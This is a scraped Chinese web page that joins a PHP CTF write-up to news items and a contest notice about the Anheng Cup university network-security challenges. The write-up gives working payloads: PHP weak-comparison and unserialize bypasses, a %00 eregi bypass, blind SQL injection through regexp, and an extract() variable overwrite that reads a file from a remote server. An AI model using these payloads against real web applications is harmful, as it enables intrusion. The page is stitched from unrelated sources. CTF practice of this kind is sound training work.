php代码审计
题目很简单GET传入参数args然后eval(var_dump($$args))直接传入全局变量GLOBALS就能执行
php是最好的语言
.bak泄露拿到源码
$v1=0;$v2=0;$v3=0;
$a=(array)unserialize(@$_GET['foo']);
print_r($a);
if(is_array($a)){
is_numeric(@$a["param1"])?exit:NULL;
if(@$a["param1"]){
($a["param1"]&2017)?$v1=1:NULL;
if(is_array(@$a["param2"])){
if(count($a["param2"])!==5 OR !is_array($a["param2"][0])) exit;
$pos = array_search("nudt", $a["param2"]);
$pos===false?die("nope"):NULL;
foreach($a["param2"] as $key=&$val){
$val==="nudt"?die("nope"):NULL;
$c=@$_GET['egg'];
$d=@$_GET['fish'];
if(@$c[1]){
if(!strcmp($c[1],$d) && $c[1]!==$d){
eregi("M|n|s",$d.$c[0])?err():NULL;
strpos(($c[0].$d), "MyAns")?$v3=1:NULL;
if($v1 && $v2 && $v3){
include "flag.php";
echo $flag;
最主要的几个考点，第一个序列化然后数组第一个参数大于2017就可以了。第二个，首先数组要5个参数然后数组首位必须要也是数组。array_search他匹配的时候,php进行弱比较如果是一个整形和一个其他类型比较会强制intval,然后intval（‘nudt’）=0传入0就行了，就是数组任何一位匹配到nudt都可以过。后面的array和string用strcmp比较的时候会返回null，eregi可以用用%00截断
Payload:?foo=a:2:{s:6:"param1";s:5:"2018e";s:6:"param2";a:5:{i:0;a:1:{i:0;i:1;}i:1;i:0;i:2;i:2;i:3;i:3;i:4;i:4;}}&egg[0]=%00MyAns&egg[1][]=1111&fish=1
注入题直接写payload:uname=adn'or(pwd)regexp'^a&pwd=admin后面自带单引号闭合，然后一位一位的爆最后密码：fsaoaigafsdfsdubbwouibiaewrawe
ext=php&content[]=被坑了很久以为是xss。
以后记住了这种题不一样要计算的，直接爆破
右键查看源码，html注释中是index.php的源码
&&&&index.php
&&&&&&&&$flag='xxx';
&&&&&&&&extract($_GET);
&&&&&&&&if(isset($gift)){
&&&&&&&& $content=trim(file_get_contents($flag));
&&&&&&&& if($gift==$content){
&&&&&&&& echo'flag'; }
&&&&&&&& else{
&&&&&&&& echo'flag被加密了 再加密一次就得到flag了';}
&&&&&&&& }
&&&&&&&&?&
&&&&&&&&--&
extract()造成变量覆盖，get传入即可给gift变量赋值，绕过验证，在远程vps上构造文件1.txt，内容123，url赋值给flag，file_get_contents()函数支持http协议，就会去读取我们指定的vps上的文件，修改gift值为123,即可得到flag
阅读(...) 评论()中国医科大学在2016“安恒杯”全国高校网络信息安全管理运维挑战赛中取得东北赛区第五名的佳绩
来源：中国高校之窗
为了推动全国高校的信息化安全能力建设，拓展高校网络信息安全团队建设渠道，吸引在校学生加入网络信息安全工作，在实战中培养高水平的网络信息安全运维队伍，促进高校安全团队的形成，提升我国高等教育系统的信息化安全保障能力，中国高等教育学会教育信息化分会在5月至11月举办了2016&安恒杯&全国高校网络信息安全管理运维挑战赛，邀请各高校积极参与。
中国医科大学2014级（100期）临床医学二系学生郭佩炎与网络中心教师回宝龙组成一队，在网络中心主任张文玉的带领下参加本次大赛。经过了赛前热身、赛前讨论及两个工作日的比拼，最终取得了东北赛区理论赛第四名、实践赛第五名、总成绩三等奖（第五名）的佳绩。在全国129 支高校团队中排在第45名，是全国医学类高校的最好成绩。
本次大赛分为理论赛及实践赛。理论赛要在180分钟内完成300道选择题，涉及了信息安全法律法规、信息安全管理体系、风险管理、安全工程、应急响应、灾难备份与恢复、物理安全、信息安全标准、信息安全模型、密码技术、网络与通信安全基础、网络安全应用、操作系统安全、Web与数据库安全管理、恶意代码防护、安全编程、安全攻防等内容。实践赛则为CTF形式，包括了对操作系统和网站应用服务器安全、网站多种语言源代码阅读分析、数据库管理和SQL语句、Web漏洞挖掘和利用、信息搜集能力、编程能力考察、移动应用安全、计算机取证技术和文件恢复、网络基础以及对网络流量的分析能力等的考察。
此前，在2015年12月由共青团辽宁省委员会、辽宁省教育厅主办，沈阳工程学院承办的首届辽宁省大学生网络信息安全大赛中，中国医科大学队伍也取得了二等奖（第七名）的成绩。（通讯员：徐璞 刘品初）
高校实用信息
中国教育电视台特约合作网站中国高校之窗&&&
版权所有 Copyright
All Rights Rreserved记住我的选择
各高校会员单位：
随着今年6月1日《中华人民共和国网络安全法》的正式实施，在思想和行动上将网络安全提升到一个新的高度。信息化已经涉及到学校教学、科研与管理工作中的方方面面，做好网络安全和信息化工作，就要处理好安全和发展的关系，做到协调一致、齐头并进，以安全保发展、以发展促安全。
在国家和教育行业对信息安全高度重视的大背景下，为了进一步推动高校网络信息安全队伍建设，提高广大师生的安全意识和能力水平，为了促进对网络安全法的全面学习和深入理解，现定于2017年9月~11月举办2017高校网络信息安全管理运维挑战赛（第二届），鼓励各校积极组织参与。
一、参赛对象
各高校信息化部门均可自由组队参赛。每所高校限组队一支，由高校信息化部门教师和学生组成（团队人数2~5人，其中教师不超过3人，学生不超过3人），另设领队一名（建议信息化部门安全分管领导担任）。
二、组织机构
主办单位：中国高等教育学会教育信息化分会
联合主办单位：北京邮电大学
协办单位：上海交通大学
指导单位：中国网络空间安全协会竞评演练工作委员会
中国高等教育学会教育信息化分会网络信息安全工作组负责本次大赛的具体组织和实施。
三、比赛形式
本次大赛全部线上进行，分为安全理论考察和动手实践锻炼两个阶段，各占总成绩的50%。本次大赛定位于普及和培养中高级安全运维人才，非高难度安全竞技比赛。
1）安全理论部分：标准化测试（选择题），3小时。团队所有成员均可参加，最后取最好成绩（折合为百分制）。考察点包含但不限于以下内容：
信息安全法律法规、信息安全管理体系、风险管理、安全工程、应急响应、灾难备份与恢复、物理安全、信息安全标准、信息安全模型、密码技术、网络与通信安全基础、网络安全应用、操作系统安全、Web与数据库安全管理、恶意代码防护、安全编程、安全攻防等。
2）动手实践部分：CTF（Capture The Flag）竞赛模式，8小时。以团队为单位参加，取最后总得分（折合为百分制）。考察点包含但不限于以下内容：
操作系统和网站应用服务器安全、网站多种语言源代码阅读分析（特别是PHP和JAVA）、数据库管理和SQL语句、Web漏洞挖掘和利用（SQL注入和XSS等）、信息搜集能力、编程能力考察、移动应用安全、计算机取证技术和文件恢复、网络基础以及对网络流量的分析能力。每个团队理论与实践成绩累加，满分为200分。
四、奖项设置
全国分为七大赛区（华北/华东/东北/西北/西南/华中/华南），分区决出优秀高校团队并给予现金/奖品奖励，同时颁发荣誉证书进行鼓励。每个赛区设一等奖1名（现金+实物奖品）、二等奖2名（现金+实物奖品）、三等奖3名（实物奖品）。组委会有权根据各地实际成绩情况调整各赛区奖项设置。在分赛区奖项的基础上，本次大赛另选拔出全国一等奖1名（现金+实物奖品）、二等奖2名（现金+实物奖品）、三等奖4名（现金+实物奖品），全部奖金和奖品将由赞助企业支持。获奖队伍代表将受邀参加年底在厦门举办的全国颁奖大会。
五、时间安排
报名阶段：2017年9月~10月访问大赛官网( )，注册用户并在“活动”栏目中进行报名。报名参赛不收取任何费用。
培训阶段：2017年9月~11月安排1~2次网络信息安全从基础到提高的技术培训，具体时间邮件提前通知。
比赛阶段：2017年10月~11月安全理论赛半天，动手实践赛一天。具体时间邮件提前通知。正式比赛前会安排熟悉线上比赛环境。
六、联系方式
联系人：马刚 (010)8
联系邮箱：
中国高等教育学会教育信息化分会
本次竞赛赞助单位北邮学生在全国高校网络信息安全管理运维挑战赛勇夺第一
经过几个月激烈的比赛，“2016安恒杯”全国高校网络信息安全管理运维挑战赛的成绩终于正式揭晓，颁奖将于12月9日在吉林长春举办的高校安全工作组年会上正式进行。
本次比赛有129所高校报名参加，有力推动了全国高校的信息化安全能力建设，拓展了高校网络信息安全团队建设渠道，吸引了在校学生加入网络信息安全工作，在实战中培养了高水平的网络信息安全运维队伍，促进了高校安全团队的形成，提升了我国高等教育系统的信息化安全保障能力。
大赛采用线上参加考试的方式，9月28日第一阶段进行安全理论赛，考察点涵盖信息安全法律法规、安全管理体系、风险管理、安全工程、应急响应、信息安全模型、密码技术、恶意代码防护、安全编程等前沿领域；10月31日第二阶段以CTF(Capture The Flag)竞赛模式进行了连续8小时的实践赛，考察点涵盖了网站多种语言源代码阅读分析（特别是PHP和JAVA）、Web漏洞挖掘和利用（SQL注入和XSS等）、信息搜集能力、计算机取证技术和文件恢复等安全热点技能，经过两个阶段的激烈角逐，我校获得“全国一等奖” 的佳绩。
责任编辑：
声明：本文由入驻搜狐号的作者撰写，除搜狐官方账号外，观点仅代表作者本人，不代表搜狐立场。
今日搜狐热点您现在的位置： >
华农获“安恒杯”全国高校网络信息安全管理运维挑战赛三等奖
导读：近日，经过两轮激烈的比赛，2016年“安恒杯”全国高校网络信息安全管理运维挑战赛的成绩正式揭晓。由我校学子郭培炜、林少彪、傅秀妍、蓝灿荣组成的参赛队获得“华南区三等奖”的佳绩。 大赛采用线上竞赛的方式分两个阶段进行，9月28日第一阶段进行安全理论
近日，经过两轮激烈的比赛，2016年“安恒杯”全国高校网络信息安全管理运维挑战赛的成绩正式揭晓。由我校学子郭培炜、林少彪、傅秀妍、蓝灿荣组成的参赛队获得“华南区三等奖”的佳绩。大赛采用线上竞赛的方式分两个阶段进行，9月28日第一阶段进行安全理论赛，考察点涵盖信息安全法律法规、安全管理体系、风险管理、安全工程、应急响应、信息安全模型、密码技术、恶意代码防护、安全编程等前沿领域；10月31日第二阶段以CTF(CaptureTheFlag)竞赛模式进行了连续8小时的实践赛，考察点涵盖了操作系统和网站应用服务器安全、网站多种语言源代码阅读分析、数据库管理和SQL语句、Web漏洞挖掘和利用（SQL注入和XSS等）、信息搜集能力、编程能力考察、移动应用安全、计算机取证技术和文件恢复、网络基础以及对网络流量的分析。本次比赛共有129所高校报名参加，有力推动了高校网络信息安全队伍建设，拓展了高校网络信息安全团队建设渠道，吸引在校学生关注网络信息安全领域，在实战中培养高水平的网络信息安全运维团队，促进了高校安全团队的形成，提升我国高等教育系统的信息化安全保障能力。据悉，本次大赛也是我校数学与信息学院为助力学校高水平大学建设推进专业教育，坚持专业教学紧跟行业前沿，实施竞教结合人才培养模式的重要举措。希望今后有更多有兴趣、爱钻研技术的师生积极参与类似的活动。我校获“安恒杯”全国高校网络信息安全管理运维挑战赛三等奖
所属频道：大学新闻
责任编辑：总编
分享给朋友：
Copyright & & 版权所有
国家信息产业部正式批准备案的合法网络传媒（备案编号：& ）网站律师：广州张律师
广东地区招生宣传的第三类优秀传媒（报纸、电视、网络） 广东省信息化协会会员网站&广东省互联网协会会员网站